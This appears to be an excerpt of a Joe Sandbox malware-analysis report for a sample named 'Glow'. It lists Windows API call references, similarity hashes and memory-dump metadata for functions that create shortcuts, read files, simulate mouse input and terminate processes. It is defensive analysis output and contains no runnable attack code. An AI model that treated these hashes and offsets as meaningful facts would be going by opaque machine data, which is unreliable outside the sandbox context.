                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3859894641-0
                                                                                                                                                                          • Opcode ID: f8131512a550a7b94c3aadd627bbc12e0302a79d9693b5aaebab43d7acbee337
                                                                                                                                                                          • Instruction ID: 72121468f907ebd871d5f2b8012ffbcd9d53b77dac32a7ee80cef9c9841c3d38
                                                                                                                                                                          • Opcode Fuzzy Hash: f8131512a550a7b94c3aadd627bbc12e0302a79d9693b5aaebab43d7acbee337
                                                                                                                                                                          • Instruction Fuzzy Hash: 47513B75500370E6CF2AAF66D889B69B3E8EF55310F148547E906DF2D6DBB08C80CB55
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 003F9F2A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F9F4B
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F9F72
                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 003F9FCA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                          • String ID: X
                                                                                                                                                                          • API String ID: 83654149-3081909835
                                                                                                                                                                          • Opcode ID: 0fdc4d8b7ee6ca53ef99ce78868cadf50cb8080f74b4ba070e5efe5157979272
                                                                                                                                                                          • Instruction ID: acfe0936340ec98216f48c2b312d39341b7ce834db8623e4325d14311f37e90b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fdc4d8b7ee6ca53ef99ce78868cadf50cb8080f74b4ba070e5efe5157979272
                                                                                                                                                                          • Instruction Fuzzy Hash: AFE191316043419FC726EF24C881B6AB7E5FF85314F1589ADF9898B2A2DB31DD05CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F6F21
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 003F707E
                                                                                                                                                                          • CoCreateInstance.OLE32(00420CC4,00000000,00000001,00420B34,?), ref: 003F7095
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 003F7319
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                          • API String ID: 886957087-24824748
                                                                                                                                                                          • Opcode ID: c6bf202c441d61ce704fdccb83ce99780bf8c6b0e58eb10ea7886e60cc4c374f
                                                                                                                                                                          • Instruction ID: 895f6b35c2c7b9a44f1fa3086af798be9a93f6494abeca840dc6f8b74bd65b29
                                                                                                                                                                          • Opcode Fuzzy Hash: c6bf202c441d61ce704fdccb83ce99780bf8c6b0e58eb10ea7886e60cc4c374f
                                                                                                                                                                          • Instruction Fuzzy Hash: 81D13871608305AFC305EF24C881A6BB7E8FF98704F50496DF5958B2A2DB71ED45CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 003F11B3
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 003F11EE
                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 003F120A
                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003F1283
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003F129A
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F12C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3368777196-0
                                                                                                                                                                          • Opcode ID: 844077d2044efc72202dafa88ba5e7de01b6b9663f51382193aa83c2a42b3a71
                                                                                                                                                                          • Instruction ID: 82996d161790f8381e64a88a745198e42f28dc5b53ff38649d2de767fd00d36c
                                                                                                                                                                          • Opcode Fuzzy Hash: 844077d2044efc72202dafa88ba5e7de01b6b9663f51382193aa83c2a42b3a71
                                                                                                                                                                          • Instruction Fuzzy Hash: CE415C75A00205EFDF069F94DCC5AAAB7B8FF45310F1480A5EE009E296DB30DE55DBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,003DFBEF,00000000,?,?,00000000,?,003C39E2,00000004,00000000,00000000), ref: 00418CA7
                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00418CCD
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00418D2C
                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00418D40
                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00418D66
                                                                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00418D8A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                                          • Opcode ID: ec2ca9fe73fe8eed6aecab95d745ea71f83285f41149f1488fe2d3b597631e92
                                                                                                                                                                          • Instruction ID: 1a25b2416ba57559cd644cae104684145861fd767673cdffa7f496958b1ca4a3
                                                                                                                                                                          • Opcode Fuzzy Hash: ec2ca9fe73fe8eed6aecab95d745ea71f83285f41149f1488fe2d3b597631e92
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C419370701344AFDB25DF24D989BE27BF1FB46305F1841AEE5084B3A2DB75A885CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00402D45
                                                                                                                                                                            • Part of subcall function 003FEF33: GetWindowRect.USER32(?,?), ref: 003FEF4B
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00402D6F
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00402D76
                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00402DB2
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00402DDE
                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00402E3C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2387181109-0
                                                                                                                                                                          • Opcode ID: ca19caf7831d2138d0d60fe9ac0a3ac616fcc020e5623dd65943570fbf539e47
                                                                                                                                                                          • Instruction ID: 337c0ea3ff8ba1c2dc8d4d64686023f8d9e3222f17e626220d52a5b459a09e13
                                                                                                                                                                          • Opcode Fuzzy Hash: ca19caf7831d2138d0d60fe9ac0a3ac616fcc020e5623dd65943570fbf539e47
                                                                                                                                                                          • Instruction Fuzzy Hash: CF31CF72905315AFC720DF14C849B9BB7A9FF84314F00092AF999A72C1DB74E9098B96
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 003E55F9
                                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003E5616
                                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003E564E
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003E566C
                                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003E5674
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 003E567E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 72514467-0
                                                                                                                                                                          • Opcode ID: ef09d21bbc910094aec52a044cec3a0ffc85dd3bd1b02bb0844334c7ba546c22
                                                                                                                                                                          • Instruction ID: 0644a868963c93e52c16f057435b8ed3442e7d70ea422592a24e39147c51e9c3
                                                                                                                                                                          • Opcode Fuzzy Hash: ef09d21bbc910094aec52a044cec3a0ffc85dd3bd1b02bb0844334c7ba546c22
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E2123726046507BEB175B3ADC49EBB7BACDF46764F148139F809CE1D1EBA4CC418660
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00385851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003855D1,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00385871
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F62C0
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 003F63DA
                                                                                                                                                                          • CoCreateInstance.OLE32(00420CC4,00000000,00000001,00420B34,?), ref: 003F63F3
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 003F6411
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                          • API String ID: 3172280962-24824748
                                                                                                                                                                          • Opcode ID: eff653d1d48088c2cf8eefd7fe62d0de09a6df2c033d5f4bcfe590573ee1f1b6
                                                                                                                                                                          • Instruction ID: 5b5ece1990ceada2b8e2d032cafb9e147848b41e4d61124f307a19ecfd438d20
                                                                                                                                                                          • Opcode Fuzzy Hash: eff653d1d48088c2cf8eefd7fe62d0de09a6df2c033d5f4bcfe590573ee1f1b6
                                                                                                                                                                          • Instruction Fuzzy Hash: 55D15374A043059FC716EF24C481A2ABBE5FF89714F11889DF9899B361CB31EC05CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,003A36E9,003A3355), ref: 003A3700
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003A370E
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003A3727
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,003A36E9,003A3355), ref: 003A3779
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: ac5b93ea6d3eb92d1c879c6a98baf8b2d00318c050488b6f0f51df4ff1410d62
                                                                                                                                                                          • Instruction ID: 704b7f284358609e6530205e773a7852315be96b5192bb5e1e99a0cb2b340a01
                                                                                                                                                                          • Opcode Fuzzy Hash: ac5b93ea6d3eb92d1c879c6a98baf8b2d00318c050488b6f0f51df4ff1410d62
                                                                                                                                                                          • Instruction Fuzzy Hash: FD01F7F6A5E3216EA72B2BB4BCC6A676B94EB077797200339F5204A0F0EF524D025244
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,003A4D53,00000000,?,?,003A68E2,?,?,00000000), ref: 003B30EB
                                                                                                                                                                          • _free.LIBCMT ref: 003B311E
                                                                                                                                                                          • _free.LIBCMT ref: 003B3146
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 003B3153
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 003B315F
                                                                                                                                                                          • _abort.LIBCMT ref: 003B3165
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                          • Opcode ID: bc09b3e176ad03a251391dd270d3d9790ed0e56489da9214fe389891d6859506
                                                                                                                                                                          • Instruction ID: 90493ae317e3d98b46bf15a34f70ea0489210e2d6f0244dfbe1c0ec2bf9ecb8b
                                                                                                                                                                          • Opcode Fuzzy Hash: bc09b3e176ad03a251391dd270d3d9790ed0e56489da9214fe389891d6859506
                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF0F975A0452026C213773DAC06EEF166D9FC577DB220525FF3496AD2EE248A024165
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00381F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00381F87
                                                                                                                                                                            • Part of subcall function 00381F2D: SelectObject.GDI32(?,00000000), ref: 00381F96
                                                                                                                                                                            • Part of subcall function 00381F2D: BeginPath.GDI32(?), ref: 00381FAD
                                                                                                                                                                            • Part of subcall function 00381F2D: SelectObject.GDI32(?,00000000), ref: 00381FD6
                                                                                                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 004194AA
                                                                                                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 004194BE
                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 004194CC
                                                                                                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 004194DC
                                                                                                                                                                          • EndPath.GDI32(?), ref: 004194EC
                                                                                                                                                                          • StrokePath.GDI32(?), ref: 004194FC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                          • Opcode ID: 0c364bd6842bc7982c64a3c3cb126c3a573cb5fd4c918b2bfb3dd24aac932377
                                                                                                                                                                          • Instruction ID: 1ef790662625df75fa9618aa96f6257f7876ba2b4c6c96fc524a0bd12afeda67
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c364bd6842bc7982c64a3c3cb126c3a573cb5fd4c918b2bfb3dd24aac932377
                                                                                                                                                                          • Instruction Fuzzy Hash: A7111BB650010DBFDF029F90DC88EDA7F6DEB08364F04C062FA195A161C771AD55DBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 003E5B7C
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 003E5B8D
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E5B94
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 003E5B9C
                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003E5BB3
                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 003E5BC5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                          • Opcode ID: c25a407e49f88eaa0ce823eb0d6f286930f2122b2d50c540be4322f09ba3de1d
                                                                                                                                                                          • Instruction ID: c4d403a2438a3a228a7d1b8d9c4349372156562d21f0d6ee05c7bc3cc12e94e8
                                                                                                                                                                          • Opcode Fuzzy Hash: c25a407e49f88eaa0ce823eb0d6f286930f2122b2d50c540be4322f09ba3de1d
                                                                                                                                                                          • Instruction Fuzzy Hash: 530144B5E00719BBEB119BA69C49F8E7F78EB48751F008075FA09A7280D6709D00CB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003832AF
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 003832B7
                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003832C2
                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003832CD
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 003832D5
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003832DD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                          • Opcode ID: 9d96f3ee6ccaee086f3915b41e61888cd6b2fbdbf01b018969a8fdcc44a52ff4
                                                                                                                                                                          • Instruction ID: 60df1a5dc96ad1ad56ce535ff21e62d17f3378c62eb54f6fdc2f4cd1dcb95ea6
                                                                                                                                                                          • Opcode Fuzzy Hash: 9d96f3ee6ccaee086f3915b41e61888cd6b2fbdbf01b018969a8fdcc44a52ff4
                                                                                                                                                                          • Instruction Fuzzy Hash: 330167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003EF447
                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003EF45D
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 003EF46C
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EF47B
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EF485
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EF48C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
